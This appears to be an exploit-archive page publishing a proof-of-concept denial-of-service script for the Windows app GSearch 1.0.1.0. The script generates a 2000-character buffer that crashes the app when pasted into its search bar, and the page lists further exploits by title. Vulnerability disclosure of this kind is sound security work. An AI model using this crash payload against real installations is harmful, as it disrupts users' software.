Menu

"GSearch 1.0.1.0 - Denial of Service (PoC)"

Author

0xB9

Platform

windows

Release date

2019-06-24

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
# Exploit Title: GSearch v1.0.1.0 - Denial of Service (PoC)
# Date: 6/23/2019
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://www.microsoft.com/store/productId/9NDTMZKLC693
# Version: 1.0.1.0
# Tested on: Windows 10

# Proof of Concept:
# Run the python script, it will create a new file "PoC.txt"
# Copy the text from the generated PoC.txt file to clipboard
# Paste the text in the search bar and click search
# Click any link and app will crash


buffer = "A" * 2000
payload = buffer
try:
    f = open("PoC.txt", "w")
    print("[+] Creating payload..")
    f.write(payload)
    f.close()
    print("[+] File created!")
except:
    print("File cannot be created")
Release Date Title Type Platform Author
2019-08-15 "Microsoft Windows Text Services Framework MSCTF - Multiple Vulnerabilities" local windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Double Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - free() of Uninitialized Pointer due to Malformed JBIG2Globals Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Memory Corruption due to Malformed TTF Font" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow in CoolType.dll" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Static Buffer Overflow due to Malformed Font Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Buffer Overflow While Processing Malformed PDF" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Use-After-Free due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat Reader DC for Windows - Heap-Based Out-of-Bounds read due to Malformed JP2 Stream" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in FixSbitSubTableFormat1" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in WriteTableFromStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadAllocFormat12CharGlyphMapList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in ReadTableIntoStructure" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap Corruption in FixSbitSubTables" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Double Free in MergeFormat12Cmap / MakeFormat12MergedGlyphList" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Heap-Based Out-of-Bounds read in GetGlyphIdx" dos windows "Google Security Research"
2019-08-15 "Microsoft Font Subsetting - DLL Returning a Dangling Pointer via MergeFontPackage" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Call from Uninitialized Memory due to Empty FDArray in Type 1 Fonts" dos windows "Google Security Research"
2019-08-15 "Adobe Acrobat CoolType (AFDKO) - Memory Corruption in the Handling of Type 1 Font load/store Operators" dos windows "Google Security Research"
2019-08-14 "ManageEngine opManager 12.3.150 - Authenticated Code Execution" webapps windows kindredsec
2019-08-14 "TortoiseSVN 1.12.1 - Remote Code Execution" webapps windows Vulnerability-Lab
2019-08-14 "Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion" local windows "Abdelhamid Naceri"
2019-08-12 "Steam Windows Client - Local Privilege Escalation" local windows AbsoZed
2019-08-14 "Windows PowerShell - Unsanitized Filename Command Execution" dos windows hyp3rlinx
2019-08-05 "Apache Tika 1.15 - 1.17 - Header Command Injection (Metasploit)" remote windows Metasploit
2019-07-26 "Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation" local windows ShivamTrivedi
2019-07-18 "Microsoft Windows 10 1903/1809 - RPCSS Activation Kernel Security Callback Privilege Escalation" local windows "Google Security Research"
Release Date Title Type Platform Author
2019-06-24 "GSearch 1.0.1.0 - Denial of Service (PoC)" dos windows 0xB9
2019-03-19 "MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting" webapps php 0xB9
2019-02-15 "MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / Cross-Site Request Forgery" webapps php 0xB9
2019-02-14 "LayerBB 1.1.2 - Cross-Site Request Forgery (Add Admin)" webapps php 0xB9
2019-02-15 "VSCO 1.1.1.0 - Denial of Service (PoC)" dos windows 0xB9
2019-02-12 "LayerBB 1.1.2 - Cross-Site Scripting" webapps php 0xB9
2019-02-11 "MyBB Bans List 1.0 - Cross-Site Scripting" webapps php 0xB9
2019-01-28 "MyBB IP History Logs Plugin 1.0.2 - Cross-Site Scripting" webapps php 0xB9
2019-01-28 "Smart VPN 1.1.3.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "FastTube 1.0.1.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "VPN Browser+ 1.1.0.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "7 Tik 1.0.1.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "Eco Search 1.0.2.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "One Search 1.1.0.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-18 "Watchr 1.1.0.0 - Denial of Service (PoC)" dos windows 0xB9
2019-01-07 "MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting" webapps php 0xB9
2019-01-07 "LayerBB 1.1.1 - Persistent Cross-Site Scripting" webapps php 0xB9
2018-09-12 "MyBB 1.8.17 - Cross-Site Scripting" webapps php 0xB9
2018-08-20 "MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Request Forgery" webapps php 0xB9
2018-08-10 "MyBB Like Plugin 3.0.0 - Cross-Site Scripting" webapps php 0xB9
2018-07-19 "MyBB New Threads Plugin 1.1 - Cross-Site Scripting" webapps php 0xB9
2018-08-10 "MyBB Thank You/Like Plugin 3.0.0 - Cross-Site Scripting" webapps php 0xB9
2018-06-05 "MyBB Recent Threads Plugin 1.0 - Cross-Site Scripting" webapps php 0xB9
2018-05-29 "MyBB ChangUonDyU Plugin 1.0.2 - Cross-Site Scripting" webapps php 0xB9
2018-05-25 "MyBB Moderator Log Notes Plugin 1.1 - Cross-Site Scripting" webapps php 0xB9
2018-05-16 "MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery" webapps php 0xB9
2018-05-10 "MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting" webapps php 0xB9
2018-04-26 "MyBB Threads to Link Plugin 1.3 - Cross-Site Scripting" webapps php 0xB9
2018-04-26 "October CMS User Plugin 1.4.5 - Persistent Cross-Site Scripting" webapps php 0xB9
2018-04-05 "MyBB Plugin Downloads 2.0.3 - Cross-Site Scripting" webapps php 0xB9
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47026/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/47026/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/47026/41428/gsearch-1010-denial-of-service-poc/download/", "exploit_id": "47026", "exploit_description": "\"GSearch 1.0.1.0 - Denial of Service (PoC)\"", "exploit_date": "2019-06-24", "exploit_author": "0xB9", "exploit_type": "dos", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse